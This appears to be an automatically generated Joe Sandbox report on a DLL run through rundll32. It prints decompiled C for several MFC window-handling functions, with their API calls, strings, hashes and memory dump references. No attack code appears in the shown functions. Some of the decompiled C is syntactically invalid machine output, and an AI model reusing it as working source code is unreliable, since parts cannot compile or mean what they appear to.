GetVersion.KERNEL32 ref: 10028DED
GetVersion.KERNEL32 ref: 10028DF8
GetVersion.KERNEL32 ref: 10028E00
GetVersion.KERNEL32 ref: 10028E06
RegisterWindowMessageA.USER32(MSWHEEL_ROLLMSG), ref: 10028E13

Strings

MSWHEEL_ROLLMSG, xrefs: 10028E0E

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Version$MessageRegisterWindow
String ID: MSWHEEL_ROLLMSG
API String ID: 303823969-2485103130
Opcode ID: 85f3e66c9038b440300e9b11d08aab107bdf81c33b47830274e071894da04cd4
Instruction ID: a1cfe5ae80d7d924f96357e0403be069d270e7200ca7c890729efff85db7b39d
Opcode Fuzzy Hash: 85f3e66c9038b440300e9b11d08aab107bdf81c33b47830274e071894da04cd4
Instruction Fuzzy Hash: 34E0D83E80213792F700A374AD0034939D5DB442E0F930066ED0042258CB24098747A5

Uniqueness

Uniqueness Score: -1.00%

Function 1000C209, Relevance: 9.1, APIs: 6, Instructions: 115
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E1000C209(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t37;
				signed int _t54;
				intOrPtr _t57;
				long _t60;
				struct HWND__* _t63;
				CHAR* _t64;
				void* _t65;
				void* _t67;
				void* _t71;
				void* _t72;
				long _t73;
				void* _t74;
				void* _t75;
				signed int _t77;
				void* _t78;
				signed int _t79;
				void* _t81;

				_t71 = __edx;
				_t79 = _t81 - 0x9c;
				_t37 =  *0x10057a08; // 0xfbf2b489
				 *(_t79 + 0x98) = _t37 ^ _t79;
				_t73 =  *(_t79 + 0xa4);
				_t77 = 0;
				 *((intOrPtr*)(_t79 - 0x80)) =  *((intOrPtr*)(_t79 + 0xa8));
				E1000C12A(0);
				_t67 = _t72;
				_t63 = E1000C15E(0, _t79 - 0x70);
				 *(_t79 - 0x7c) = _t63;
				if(_t63 !=  *(_t79 - 0x70)) {
					EnableWindow(_t63, 1);
				}
				 *(_t79 - 0x78) =  *(_t79 - 0x78) & _t77;
				GetWindowThreadProcessId(_t63, _t79 - 0x78);
				if(_t63 == 0 ||  *(_t79 - 0x78) != GetCurrentProcessId()) {
					L6:
					__eflags = _t73;
					if(__eflags != 0) {
						_t77 = _t73 + 0x78;
					}
					goto L8;
				} else {
					_t60 = SendMessageA(_t63, 0x376, 0, 0);
					if(_t60 == 0) {
						goto L6;
					} else {
						_t77 = _t60;
						L8:
						 *(_t79 - 0x74) =  *(_t79 - 0x74) & 0x00000000;
						if(_t77 != 0) {
							 *(_t79 - 0x74) =  *_t77;
							_t57 =  *((intOrPtr*)(_t79 + 0xb0));
							if(_t57 != 0) {
								 *_t77 = _t57 + 0x30000;
							}
						}
						if(( *(_t79 + 0xac) & 0x000000f0) == 0) {
							_t54 =  *(_t79 + 0xac) & 0x0000000f;
							if(_t54 <= 1) {
								_t24 = _t79 + 0xac;
								 *_t24 =  *(_t79 + 0xac) | 0x00000030;
								__eflags =  *_t24;
							} else {
								if(_t54 + 0xfffffffd <= 1) {
									 *(_t79 + 0xac) =  *(_t79 + 0xac) | 0x00000020;
								}
							}
						}
						_t96 = _t73;
						 *(_t79 - 0x6c) = 0;
						if(_t73 == 0) {
							_t64 = _t79 - 0x6c;
							_t73 = 0x104;
							__eflags = GetModuleFileNameA(0, _t64, 0x104) - 0x104;
							if(__eflags == 0) {
								 *((char*)(_t79 + 0x97)) = 0;
							}
						} else {
							_t64 =  *(_t73 + 0x50);
						}
						_push( *(_t79 + 0xac));
						_push(_t64);
						_push( *((intOrPtr*)(_t79 - 0x80)));
						_push( *(_t79 - 0x7c));
						_t74 = E1000C093(_t64, _t67, _t73, _t77, _t96);
						if(_t77 != 0) {
							 *_t77 =  *(_t79 - 0x74);
						}
						if( *(_t79 - 0x70) != 0) {
							EnableWindow( *(_t79 - 0x70), 1);
						}
						E1000C12A(1);
						_pop(_t75);
						_pop(_t78);
						_pop(_t65);
						return E100167D5(_t74, _t65,  *(_t79 + 0x98) ^ _t79, _t71, _t75, _t78);
					}
				}
			}

APIs

Part of subcall function 1000C15E: GetParent.USER32(100014EC), ref: 1000C1B1
Part of subcall function 1000C15E: GetLastActivePopup.USER32(100014EC), ref: 1000C1C0
Part of subcall function 1000C15E: IsWindowEnabled.USER32(100014EC), ref: 1000C1D5
Part of subcall function 1000C15E: EnableWindow.USER32(100014EC,00000000), ref: 1000C1E8

EnableWindow.USER32(?,00000001), ref: 1000C256
GetWindowThreadProcessId.USER32(?,?), ref: 1000C264
GetCurrentProcessId.KERNEL32 ref: 1000C26E
SendMessageA.USER32 ref: 1000C283
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1000C300
EnableWindow.USER32(?,00000001), ref: 1000C33C

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
String ID:
API String ID: 1877664794-0
Opcode ID: d475a19da1505cd8c491af7de1dd181a650697f179afdcdb5f27c752af681c02
Instruction ID: 906afa4fd5bad6b09c7d7bb12576003d117f5a582180c2333a3862cf80afbe79
Opcode Fuzzy Hash: d475a19da1505cd8c491af7de1dd181a650697f179afdcdb5f27c752af681c02
Instruction Fuzzy Hash: A1416A32A0035C9FFB31CFA58C85FDD7BA8EF05390F210129E949AB286D7709A408B50

Uniqueness

Uniqueness Score: -1.00%

Function 1000C15E, Relevance: 9.1, APIs: 6, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000C15E(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t7;
				void* _t13;
				struct HWND__** _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;

				_t18 = _a4;
				_t17 = _t18;
				if(_t18 != 0) {
					L5:
					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
						L8:
						_t16 = _t17;
						_t7 = _t17;
						if(_t17 == 0) {
							L10:
							if(_t18 == 0 && _t17 != 0) {
								_t17 = GetLastActivePopup(_t17);
							}
							_t15 = _a8;
							if(_t15 != 0) {
								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
									 *_t15 =  *_t15 & 0x00000000;
								} else {
									 *_t15 = _t16;
									EnableWindow(_t16, 0);
								}
							}
							return _t17;
						} else {
							goto L9;
						}
						do {
							L9:
							_t16 = _t7;
							_t7 = GetParent(_t7);
						} while (_t7 != 0);
						goto L10;
					}
					_t17 = GetParent(_t17);
					L7:
					if(_t17 != 0) {
						goto L5;
					}
					goto L8;
				}
				_t13 = E1000C087();
				if(_t13 != 0) {
					L4:
					_t17 =  *(_t13 + 0x20);
					goto L7;
				}
				_t13 = E1000A7CE();
				if(_t13 != 0) {
					goto L4;
				}
				_t17 = 0;
				goto L8;
			}

APIs

GetWindowLongA.USER32 ref: 1000C190
GetParent.USER32(100014EC), ref: 1000C19E
GetParent.USER32(100014EC), ref: 1000C1B1
GetLastActivePopup.USER32(100014EC), ref: 1000C1C0
IsWindowEnabled.USER32(100014EC), ref: 1000C1D5
EnableWindow.USER32(100014EC,00000000), ref: 1000C1E8

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: 716a915a51b72e7755bd765e65025d5e7cdfb43fa73cbfe2d9e3b7854765710c
Instruction ID: b03ffd99d979528eb1576ebd7f6c5d6629826c0934e428a14188cd3025a76a69
Opcode Fuzzy Hash: 716a915a51b72e7755bd765e65025d5e7cdfb43fa73cbfe2d9e3b7854765710c
Instruction Fuzzy Hash: CC11A33264533A57F221DB698C80F9A72ECDF4BAD0F260129FC44E329ADB60DC0242D5

Uniqueness

Uniqueness Score: -1.00%

Function 1001411A, Relevance: 9.0, APIs: 6, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E1001411A(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t12;
				struct HWND__* _t21;

				ClientToScreen(_a4,  &_a8);
				_push(5);
				_push(_a4);
				while(1) {
					_t12 = GetWindow();
					_t21 = _t12;
					if(_t21 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
						GetWindowRect(_t21,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t21;
						}
					}
					_push(2);
					_push(_t21);
				}
				return _t12;
			}

APIs

ClientToScreen.USER32(?,?), ref: 10014129
GetDlgCtrlID.USER32 ref: 1001413D
GetWindowLongA.USER32 ref: 1001414B
GetWindowRect.USER32 ref: 1001415D
PtInRect.USER32(?,?,?), ref: 1001416D
GetWindow.USER32(?,00000005), ref: 1001417A

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: fd09e00dcf5aea0f889a5d5334f0ce8489c3ad9d17b5f7afd937dd6b6d05cc64
Instruction ID: 106842abd73dbf2249684b53af78e8d9c6ae05809ec90903e9ae8d6f26667822
Opcode Fuzzy Hash: fd09e00dcf5aea0f889a5d5334f0ce8489c3ad9d17b5f7afd937dd6b6d05cc64
Instruction Fuzzy Hash: AA014F36500126BBDB12DF658C48EDE77ACEF15791F124114F911AA1A0DB30DA82CA94

Uniqueness

Uniqueness Score: -1.00%

Function 10012406, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 234
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E10012406(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				char* _v20;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v52;
				signed int _v56;
				void* __ebp;
				intOrPtr _t122;
				void* _t128;
				intOrPtr _t130;
				signed int _t139;
				signed int _t144;
				signed int _t175;
				signed int _t177;
				signed int _t179;
				signed int _t181;
				signed int _t183;
				signed int _t187;
				void* _t190;
				intOrPtr _t191;
				signed int _t201;

				_t190 = __ecx;
				_t122 = E1000D5EC(__ebx, __edi, __esi, __eflags);
				_v8 = _t122;
				_t3 =  &_a4;
				 *_t3 = _a4 &  !( *(_t122 + 0x18));
				if( *_t3 == 0) {
					return 1;
				}
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t201 = 0;
				E100174D0(0,  &_v56, 0, 0x28);
				_v52 = DefWindowProcA;
				_t128 = E1000D5EC(__ebx, 0, 0, __eflags);
				__eflags = _a4 & 0x00000001;
				_v40 =  *((intOrPtr*)(_t128 + 8));
				_t130 =  *0x1005aa70; // 0x10003
				_t187 = 8;
				_v32 = _t130;
				_v16 = _t187;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0xb;
					_v20 = "AfxWnd80s";
					_t183 = E10012222(_t187, _t190, 0, 0, __eflags);
					__eflags = _t183;
					if(_t183 != 0) {
						_t201 = 1;
						__eflags = 1;
					}
				}
				__eflags = _a4 & 0x00000020;
				if(__eflags != 0) {
					_v56 = _v56 | 0x0000008b;
					_push( &_v56);
					_v20 = "AfxOleControl80s";
					_t181 = E10012222(_t187, _t190, 0, _t201, __eflags);
					__eflags = _t181;
					if(_t181 != 0) {
						_t201 = _t201 | 0x00000020;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000002;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0;
					_v20 = "AfxControlBar80s";
					_v28 = 0x10;
					_t179 = E10012222(_t187, _t190, 0, _t201, __eflags);
					__eflags = _t179;
					if(_t179 != 0) {
						_t201 = _t201 | 0x00000002;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000004;
				if(__eflags != 0) {
					_v56 = _t187;
					_v28 = 0;
					_t177 = E100123C5(_t190, __eflags,  &_v56, "AfxMDIFrame80s", 0x7a01);
					__eflags = _t177;
					if(_t177 != 0) {
						_t201 = _t201 | 0x00000004;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & _t187;
				if(__eflags != 0) {
					_v56 = 0xb;
					_v28 = 6;
					_t175 = E100123C5(_t190, __eflags,  &_v56, "AfxFrameOrView80s", 0x7a02);
					__eflags = _t175;
					if(_t175 != 0) {
						_t201 = _t201 | _t187;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000010;
				if(__eflags != 0) {
					_v12 = 0xff;
					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x3fc0);
					_t48 =  &_a4;
					 *_t48 = _a4 & 0xffffc03f;
					__eflags =  *_t48;
				}
				__eflags = _a4 & 0x00000040;
				if(__eflags != 0) {
					_v12 = 0x10;
					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x40);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000080;
				if(__eflags != 0) {
					_v12 = 2;
					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x80);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000100;
				if(__eflags != 0) {
					_v12 = _t187;
					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x100);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000200;
				if(__eflags != 0) {
					_v12 = 0x20;
					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x200);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000400;
				if(__eflags != 0) {
					_v12 = 1;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x400);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000800;
				if(__eflags != 0) {
					_v12 = 0x40;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x800);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00001000;
				if(__eflags != 0) {
					_v12 = 4;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x1000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00002000;
				if(__eflags != 0) {
					_v12 = 0x80;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x2000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00004000;
				if(__eflags != 0) {
					_v12 = 0x800;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x4000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00008000;
				if(__eflags != 0) {
					_v12 = 0x400;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x8000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00010000;
				if(__eflags != 0) {
					_v12 = 0x200;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x10000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00020000;
				if(__eflags != 0) {
					_v12 = 0x100;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x20000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00040000;
				if(__eflags != 0) {
					_v12 = 0x8000;
					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x40000);
					__eflags = _t201;
				}
				_t191 = _v8;
				 *(_t191 + 0x18) =  *(_t191 + 0x18) | _t201;
				_t139 =  *(_t191 + 0x18);
				__eflags = (_t139 & 0x00003fc0) - 0x3fc0;
				if((_t139 & 0x00003fc0) == 0x3fc0) {
					 *(_t191 + 0x18) = _t139 | 0x00000010;
					_t201 = _t201 | 0x00000010;
					__eflags = _t201;
				}
				asm("sbb eax, eax");
				_t144 =  ~((_t201 & _a4) - _a4) + 1;
				__eflags = _t144;
				return _t144;
			}

APIs

_memset.LIBCMT ref: 10012434

Strings

AfxFrameOrView80s, xrefs: 100124FA
AfxMDIFrame80s, xrefs: 100124D5
@, xrefs: 100125D9
@, xrefs: 10012540

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: _memset
String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
API String ID: 2102423945-4122032997
Opcode ID: 6a965a47b8202c06a0f9d29b019c3ce5b36ca544f607173cb73e005fb23cc034
Instruction ID: 475a3f3acc0ffbf0912b6f4f501dab117ae518df3bc7e116c44220daacf7d2ae
Opcode Fuzzy Hash: 6a965a47b8202c06a0f9d29b019c3ce5b36ca544f607173cb73e005fb23cc034
Instruction Fuzzy Hash: 658130B5D00259AADB41CFA4C581BDEBBF8FF08384F118165F949EA181E774DAD4CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 100017E0, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 134windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1000C4C7: _memset.LIBCMT ref: 1000C4DE

_strlen.LIBCMT ref: 100018FF
_strlen.LIBCMT ref: 10001971
_strlen.LIBCMT ref: 100019B6
LoadIconA.USER32 ref: 100019FD

Strings

127.0.0.1, xrefs: 100018E8, 100018FA, 1000190E

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: _strlen$IconLoad_memset
String ID: 127.0.0.1
API String ID: 858515944-3619153832
Opcode ID: e9afa9abf4479f427d282929ffcd92459c0614fc8bef9fc4e3152ff44be5b39a
Instruction ID: 391a885bd144bb184e99009df4bcd3f8a2a5cd6933164126564d3f2e09fb5126
Opcode Fuzzy Hash: e9afa9abf4479f427d282929ffcd92459c0614fc8bef9fc4e3152ff44be5b39a
Instruction Fuzzy Hash: 835106B4D04298DBEB14CFA4D891B9DBBB1EF44344F1081A9E50D6B386DB356E44CF60

Uniqueness

Uniqueness Score: -1.00%

Function 1001486F, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E1001486F(void* __ebx, void** __ecx, void* __edx, void* __esi, char* _a4, short _a8) {
				signed int _v8;
				short _v72;
				char* _v76;
				signed int _v80;
				signed int* _v84;
				signed int _v88;
				intOrPtr _v92;
				void* __edi;
				void* __ebp;
				signed int _t54;
				void* _t66;
				short* _t70;
				signed int _t72;
				signed int _t81;
				signed int* _t83;
				short* _t84;
				void* _t91;
				signed int* _t98;
				signed int _t99;
				void** _t100;
				intOrPtr _t102;
				signed int _t104;
				signed int _t106;
				void* _t107;

				_t101 = __esi;
				_t97 = __edx;
				_t82 = __ebx;
				_t54 =  *0x10057a08; // 0xfbf2b489
				_v8 = _t54 ^ _t106;
				_t100 = __ecx;
				_v76 = _a4;
				if(__ecx[1] != 0) {
					_push(__ebx);
					_push(__esi);
					_t83 = GlobalLock( *__ecx);
					_v84 = _t83;
					_v88 = 0 | _t83[0] == 0x0000ffff;
					_v80 = E100146B2(_t83);
					_t102 = (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1 + (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1;
					_v92 = _t102;
					if(_v88 == 0) {
						 *_t83 =  *_t83 | 0x00000040;
					} else {
						_t83[3] = _t83[3] | 0x00000040;
					}
					if(lstrlenA(_v76) >= 0x20) {
						L15:
						_t66 = 0;
					} else {
						_t97 = _t102 + MultiByteToWideChar(0, 0, _v76, 0xffffffff,  &_v72, 0x20) * 2;
						_v76 = _t97;
						if(_t97 < _t102) {
							goto L15;
						} else {
							_t70 = E100146DD(_t83);
							_t91 = 0;
							_t84 = _t70;
							if(_v80 != 0) {
								_t81 = E100169F6(_t84 + _t102);
								_t97 = _v76;
								_t91 = _t102 + 2 + _t81 * 2;
							}
							_t33 = _t97 + 3; // 0x3
							_t98 = _v84;
							_t36 = _t84 + 3; // 0x10002
							_t72 = _t91 + _t36 & 0xfffffffc;
							_t104 = _t84 + _t33 & 0xfffffffc;
							_v80 = _t72;
							if(_v88 == 0) {
								_t99 =  *(_t98 + 8) & 0x0000ffff;
							} else {
								_t99 =  *(_t98 + 0x10) & 0x0000ffff;
							}
							if(_v76 == _t91 || _t99 <= 0) {
								L17:
								 *_t84 = _a8;
								_t97 =  &_v72;
								E100147F2(_t84 + _v92, _t100, _t104, _t106, _t84 + _v92, _v76 - _v92,  &_v72, _v76 - _v92);
								_t100[1] = _t100[1] + _t104 - _v80;
								GlobalUnlock( *_t100);
								_t100[2] = _t100[2] & 0x00000000;
								_t66 = 1;
							} else {
								_t97 = _t100[1];
								_t95 = _t97 - _t72 + _v84;
								if(_t97 - _t72 + _v84 <= _t97) {
									E100147F2(_t84, _t100, _t104, _t106, _t104, _t95, _t72, _t95);
									_t107 = _t107 + 0x10;
									goto L17;
								} else {
									goto L15;
								}
							}
						}
					}
					_pop(_t101);
					_pop(_t82);
				} else {
					_t66 = 0;
				}
				return E100167D5(_t66, _t82, _v8 ^ _t106, _t97, _t100, _t101);
			}

APIs

GlobalLock.KERNEL32 ref: 10014899
lstrlenA.KERNEL32(?), ref: 100148E1
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 100148FB

Strings

System, xrefs: 10014895

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: ByteCharGlobalLockMultiWidelstrlen
String ID: System
API String ID: 1529587224-3470857405
Opcode ID: 5539861cf9964bd4a1f8d2b85f820bea2489ddcf645bd320d082abb330923d9c
Instruction ID: 74ffa1d7f554f06ed3380e5a1b3eb1278af2c0b09513685a0b874fafc39ddc5e
Opcode Fuzzy Hash: 5539861cf9964bd4a1f8d2b85f820bea2489ddcf645bd320d082abb330923d9c
Instruction Fuzzy Hash: FA41B271D00225DFDB04DFA4C885AAEBBB5FF04354F268129E411EF195EB70E986CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1000B3AF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E1000B3AF(void* __edx, signed int _a116, char _a120) {
				void _v12;
				char _v16;
				signed int _v20;
				int _v24;
				char _v124;
				char _v172;
				intOrPtr _v184;
				int __ebx;
				signed int __edi;
				signed int __esi;
				signed int __ebp;
				signed int _t26;
				unsigned int _t28;
				intOrPtr _t35;
				unsigned int _t39;
				intOrPtr _t40;
				void* _t42;
				void* _t43;
				signed int _t45;

				_t45 =  &_v124;
				_t26 =  *0x10057a08; // 0xfbf2b489
				_a116 = _t26 ^ _t45;
				_push(_t43);
				_push(_t42);
				_t28 = GetMenuCheckMarkDimensions();
				_t38 = _t28;
				_t39 = _t28 >> 0x10;
				_v24 = _t39;
				if(_t28 <= 4 || __ecx <= 5) {
					_push(_t45);
					_push(_t39);
					_v172 = 0x10057298;
					E10017C83( &_v172, 0x1002e2fc);
					asm("int3");
					_push(4);
					E10017BC1(E10027DEC, _t38, _t42, _t43);
					_t40 = E10013965(0x104);
					_v184 = _t40;
					_t35 = 0;
					_v172 = 0;
					if(_t40 != 0) {
						_t35 = E1000CF71(_t40);
					}
					return E10017C60(_t35);
				} else {
					if(__ebx > 0x20) {
						__ebx = 0x20;
					}
					__eax = __ebx - 4;
					asm("cdq");
					__eax = __ebx - 4 - __edx;
					__esi = __ebx + 0xf;
					__esi = __ebx + 0xf >> 4;
					__ebx - 4 - __edx = __ebx - 4 - __edx >> 1;
					__esi = __esi << 4;
					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4);
					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4) - __ebx;
					if(__edi > 0xc) {
						__edi = 0xc;
					}
					__eax = 0x20;
					if(__ecx > __eax) {
						_v24 = __eax;
					}
					 &_v12 = E100174D0(__edi,  &_v12, 0xff, 0x80);
					_v24 = _v24 + 0xfffffffa;
					_v24 + 0xfffffffa >> 1 = (_v24 + 0xfffffffa >> 1) * __esi;
					__ecx = __esi + __esi;
					__eax = __ebp + (_v24 + 0xfffffffa >> 1) * __esi * 2 - 0xc;
					__edx = 0x1002a144;
					_v20 = __esi + __esi;
					_v16 = 5;
					do {
						__si =  *__edx & 0x000000ff;
						__ecx = __edi;
						__si = ( *__edx & 0x000000ff) << __cl;
						__edx =  &(__edx[1]);
						__ecx = __si & 0x0000ffff;
						__eax->i = __ch;
						__eax->i = __cl;
						__eax = __eax + _v20;
						_t21 =  &_v16;
						 *_t21 = _v16 - 1;
					} while ( *_t21 != 0);
					__eax =  &_v12;
					__eax = CreateBitmap(__ebx, _v24, 1, 1,  &_v12);
					_pop(__edi);
					_pop(__esi);
					 *0x1005aa80 = __eax;
					_pop(__ebx);
					if(__eax == 0) {
						__eax = LoadBitmapA(__eax, 0x7fe3);
						 *0x1005aa80 = __eax;
					}
					__ecx = _a116;
					__ecx = _a116 ^ __ebp;
					__eax = E100167D5(__eax, __ebx, _a116 ^ __ebp, __edx, __edi, __esi);
					__ebp =  &_a120;
					__esp =  &_a120;
					_pop(__ebp);
					return __eax;
				}
			}

APIs

GetMenuCheckMarkDimensions.USER32 ref: 1000B3C7
_memset.LIBCMT ref: 1000B429
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 1000B47B
LoadBitmapA.USER32 ref: 1000B493

Strings

, xrefs: 1000B3E8

Memory Dump Source

